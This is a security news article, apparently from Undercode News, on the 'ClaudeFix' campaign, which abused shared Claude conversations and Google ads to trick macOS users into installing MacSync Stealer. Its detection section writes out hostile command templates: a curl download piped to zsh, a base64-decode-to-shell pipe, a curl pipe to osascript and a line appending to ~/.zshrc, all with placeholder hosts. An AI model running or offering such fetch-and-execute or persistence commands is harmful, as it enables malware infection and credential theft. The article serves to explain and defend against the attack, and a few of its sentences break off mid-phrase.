Listen to this Post

Introduction
Artificial intelligence has rapidly become one of the most trusted technologies on the internet. Millions of users rely on AI assistants every day for coding, research, productivity, and technical support. Unfortunately, cybercriminals have noticed this growing trust and are now weaponizing AI platforms themselves as part of sophisticated social engineering campaigns.
Security researchers have uncovered a dangerous new campaign known as ClaudeFix, where attackers abuse Anthropic’s shared Claude conversations to distribute MacSync Stealer, a powerful information-stealing malware designed specifically for macOS. Instead of using traditional phishing pages or fake software installers, the attackers leveraged the credibility of Claude’s official platform to convince victims that they were following legitimate troubleshooting instructions.
The campaign represents a major evolution of the infamous ClickFix technique, demonstrating that modern cybercriminals are no longer just exploiting software vulnerabilities—they are exploiting human trust in artificial intelligence.
Attack Overview
Security researchers at Zscaler discovered a sophisticated campaign internally named ClaudeFix, which targets macOS users by abusing Anthropic’s Claude sharing functionality.
Unlike previous ClickFix attacks that relied on fake browser errors or CAPTCHA verification pages, this campaign sends victims directly to legitimate Claude shared conversations hosted on Anthropic’s official infrastructure.
Because the conversations appear on a trusted AI platform, many victims naturally assume the instructions are authentic.
This subtle shift dramatically increases the success rate of the attack while making traditional phishing detection significantly more difficult.
What is ClickFix?
ClickFix first emerged during 2024 as a new social engineering technique.
Instead of silently exploiting software vulnerabilities, ClickFix convinces victims to infect themselves.
The attacker displays fake troubleshooting instructions and asks users to copy and paste commands into:
Terminal
Windows Run dialog
macOS zsh shell
The victim unknowingly executes malicious commands that download and launch malware.
Since the user performs the action voluntarily, many security protections fail to recognize the activity as malicious.
ClaudeFix is simply the newest and perhaps most convincing evolution of this attack strategy.
How the ClaudeFix Campaign Works
The attack begins with malvertising.
Users searching Google for phrases such as:
Claude Download
Claude Mac
Claude Desktop
Claude Client
are presented with sponsored advertisements.
Rather than leading directly to malware, these advertisements redirect victims to a shared Claude conversation.
The conversation is labeled:
Shared by Apple Support
The attackers simply configured their Claude profile with this display name, making the conversation appear to originate from Apple’s technical support team.
The victim now believes they are receiving official recovery instructions hosted on Anthropic’s own platform.
The Fake Fix Instructions
Inside the Claude conversation, users are instructed to execute what appears to be a troubleshooting command.
The command is actually:
Base64 encoded
Downloads remote content using curl
Pipes everything directly into zsh
This is one of the biggest warning signs in cybersecurity.
The victim never sees the real script because everything is encoded before execution.
Within seconds, malware installation begins.
Multi-Stage Malware Execution
The attackers designed a highly modular infection chain consisting of several stages.
Stage One
The first command downloads a lightweight loader from attacker-controlled infrastructure.
Its only purpose is to retrieve additional payloads.
Stage Two
The downloaded script:
Decodes hidden payloads
Decompresses encrypted content
Executes everything through eval
Suppresses terminal output
Downloads another payload
The malware intentionally avoids displaying anything suspicious to the victim.
Everything appears normal.
Stage Three
The second-stage loader retrieves an AppleScript payload.
Instead of saving the file to disk, it immediately pipes the script into:
osascript
This technique reduces forensic evidence and bypasses many traditional antivirus detections.
Stealthy Data Exfiltration
Once sensitive information has been collected, the malware compresses everything into:
/tmp/osalogging.zip
Rather than uploading one large archive, the malware:
Splits the archive into 10MB pieces
Uploads each chunk separately
Retries failed uploads up to eight times
Deletes every local trace afterward
This significantly improves reliability while making detection more difficult.
What MacSync Stealer Steals
After execution, MacSync Stealer begins harvesting nearly every valuable piece of information stored on the system.
Its targets include:
Apple Keychain
Browser passwords
Browser cookies
Firefox credentials
Chromium credentials
Password manager extensions
SSH keys
AWS credentials
Kubernetes configuration files
Telegram application data
PDF documents
Apple Keynote presentations
Wallet files
KeePass databases
Sensitive office documents
The malware searches specifically for valuable file extensions that commonly contain confidential information.
Cryptocurrency Users Are Primary Targets
One particularly dangerous capability is its focus on cryptocurrency assets.
The malware actively searches for:
Browser wallet extensions
Desktop wallet applications
Ledger software
Trezor software
If Ledger Live or Trezor software is detected, the malware attempts to download replacement installers that researchers believe are trojanized versions capable of stealing recovery phrases and private keys.
This dramatically increases the financial impact of the compromise.
Persistence Mechanism
If the malware cannot immediately obtain sufficient privileges, it modifies:
~/.zshrc
This ensures malicious commands automatically execute whenever the victim opens a new Terminal session.
The malware also attempts to convince users to grant Full Disk Access, allowing it to bypass macOS privacy protections and harvest significantly more information.
Campaign Infrastructure
According to Zscaler telemetry, the campaign operated between:
June 12 and June 19, 2026
Researchers observed:
22 unique Google Ads campaign IDs
Seven different search keyword variations
English and Chinese search terms
Multiple attacker-controlled infrastructure servers
The malicious domains mimicked ordinary American local businesses such as flooring companies and PC repair services.
This naming strategy likely helped the domains avoid suspicion during automated reputation checks.
Evidence Suggesting Russian Developers
Researchers identified Russian-language comments embedded inside the AppleScript payload.
One comment referenced a fragile database copying function used when Firefox remained open.
Although code comments alone cannot definitively attribute attacks, they strongly suggest that the malware developers are Russian-speaking.
As always, attribution should be treated cautiously until supported by additional intelligence.
Why This Campaign Matters
ClaudeFix demonstrates a significant shift in cybercriminal strategy.
Instead of impersonating banks, Microsoft, or Apple websites, attackers are now abusing legitimate AI platforms that millions of users inherently trust.
The success of this campaign highlights a growing cybersecurity challenge:
People increasingly believe information simply because it appears inside a trusted AI service.
As AI platforms become more integrated into everyday workflows, they will inevitably become high-value targets for phishing, malware delivery, credential theft, and social engineering campaigns.
Trust is becoming the newest attack surface.
Deep Analysis
ClaudeFix is technically interesting because it combines multiple modern attack techniques into a single seamless infection chain.
Instead of relying on software exploits, the attackers weaponize human psychology through AI-generated credibility. Hosting malicious instructions on a legitimate Claude shared chat removes many of the visual indicators users associate with phishing. This approach also complicates detection because network traffic initially reaches a trusted domain before redirecting to attacker-controlled infrastructure.
The
Security teams should monitor unusual command execution chains on macOS, especially when curl downloads content that is immediately piped into a shell interpreter or when AppleScript executes network-delivered payloads. Endpoint Detection and Response (EDR) platforms should generate alerts for suspicious combinations such as:
Dangerous pattern commonly abused by ClickFix campaigns curl -fsSL https://example[.]com/script | zsh
Base64 decoding followed by execution
echo "<base64>" | base64 -d | zsh
AppleScript execution from downloaded content
curl https://example[.]com/payload | osascript
Suspicious persistence modification
echo 'malicious_command' >> ~/.zshrc
Monitor recent shell history
history
Review persistence artifacts
cat ~/.zshrc
Check recent AppleScript activity
log show –predicate ‘process == “osascript”‘ –last 24h
Inspect temporary archive creation
ls -lah /tmp
Review network connections
lsof -i
Monitor active processes
ps aux | grep osascript
Search for unexpected launch agents
find ~/Library/LaunchAgents -type f
Verify installed applications
system_profiler SPApplicationsDataType
Organizations should also deploy application control policies, restrict unnecessary Terminal usage where practical, educate users never to execute “copy-and-paste” commands from chat platforms without independent verification, and continuously monitor outbound connections to newly registered or suspicious domains.
What Undercode Say:
The ClaudeFix campaign represents one of the clearest examples of how cybercriminals are adapting alongside artificial intelligence rather than fighting against it. AI platforms have become trusted environments where users naturally lower their guard, making them ideal vehicles for sophisticated social engineering.
This attack is notable because there was no software vulnerability in Claude itself. Instead, the attackers exploited the platform’s reputation. That distinction is critical. As AI assistants become embedded in enterprise workflows, attackers will increasingly focus on abusing legitimate features instead of searching for technical exploits.
Another important observation is the evolution of ClickFix. The technique has progressed from fake browser warnings to convincing AI-hosted conversations. Future iterations may include AI-generated troubleshooting sessions, interactive support chats, or personalized instructions that dynamically adapt to each victim’s responses.
The
MacSync
The campaign further demonstrates that paid advertising remains an effective malware distribution channel. Users often assume sponsored search results are verified, but malicious advertisers continue to abuse advertising ecosystems before detection and removal.
From a defensive perspective, organizations should expand security awareness training beyond phishing emails. Employees must understand that commands found in AI chats, forums, documentation, or messaging platforms should never be executed blindly, regardless of the platform hosting them.
Behavior-based detection will become increasingly important. Monitoring shell execution patterns, unusual AppleScript activity, unexpected modifications to shell configuration files, and abnormal outbound traffic can detect threats that signature-based solutions may miss.
The use of localized search terms, including Chinese-language keywords, suggests the operators were targeting a broad international audience rather than focusing on a single geographic region. This demonstrates careful planning and an understanding of global AI adoption trends.
The inclusion of Russian-language comments inside the code may provide investigative leads, but attribution should remain cautious. Malware developers frequently reuse code, collaborate across borders, or intentionally include misleading artifacts to complicate investigations.
Looking ahead, AI service providers will likely introduce stronger content moderation, abuse detection, and automated scanning for malicious command sequences shared through public conversations. However, attackers are expected to continue experimenting with new methods to bypass these safeguards.
Ultimately, ClaudeFix is a reminder that the most dangerous attacks often exploit trust rather than technology. As AI becomes a routine part of daily computing, verifying instructions before execution will be as important as patching software vulnerabilities.
✅ Confirmed: Zscaler publicly documented the ClaudeFix campaign, identifying the abuse of shared Claude chats to distribute the MacSync Stealer malware and confirming that the malicious shared conversations were reported and removed.
✅ Confirmed: The campaign relied on Google malvertising, multi-stage shell execution, AppleScript delivery, and targeted theft of credentials, sensitive documents, cloud keys, and cryptocurrency wallet data on macOS systems.
❌ Not Fully Confirmed: While Russian-language comments were discovered in the malware source code, they do not conclusively prove the attackers are based in Russia. Such artifacts can be intentionally misleading or inherited from reused code, so attribution requires additional intelligence beyond code comments alone.
Prediction
(+1) AI platform providers will significantly strengthen abuse detection, automatically identifying and blocking conversations that encourage users to execute encoded shell commands or download suspicious payloads.
(-1) Cybercriminals will increasingly migrate from traditional phishing websites to trusted AI platforms, collaborative workspaces, and developer communities, making social engineering attacks substantially more convincing and difficult for both users and security products to detect.
(-1) Information-stealing malware targeting macOS will continue to grow in sophistication, with future variants likely incorporating AI-generated instructions, adaptive payloads, and improved evasion techniques to target developers, cryptocurrency investors, and enterprise users.
▶️ Related Video (76% Match):
🕵️📝Let’s dive deep and fact‑check.
🎓 Live Courses & Certifications:
Join Undercode Academy for Verified Certifications
🚀 Request a Custom Project:
Secure, high-velocity infrastructure and disruptive technological engineering. Contact our engineering team for high-tier development and proprietary systems:
[email protected]
💎 Smart Architecture | 🛡️ Secure by Design | ⭐ Trusted by Thousands
References:
Reported By: cyberpress.org
Extra Source Hub (Possible Sources for article):
https://stackoverflow.com
Wikipedia
OpenAi & Undercode AI
Image Source:
Unsplash
Undercode AI DI v2
🔐JOIN OUR CYBER WORLD [ CVE News • HackMonitor • UndercodeNews ]
📢 Follow UndercodeNews & Stay Tuned:
𝕏 formerly Twitter 🐦 | @ Threads | 🔗 Linkedin | 🦋BlueSky | 🐘Mastodon | 📺Youtube




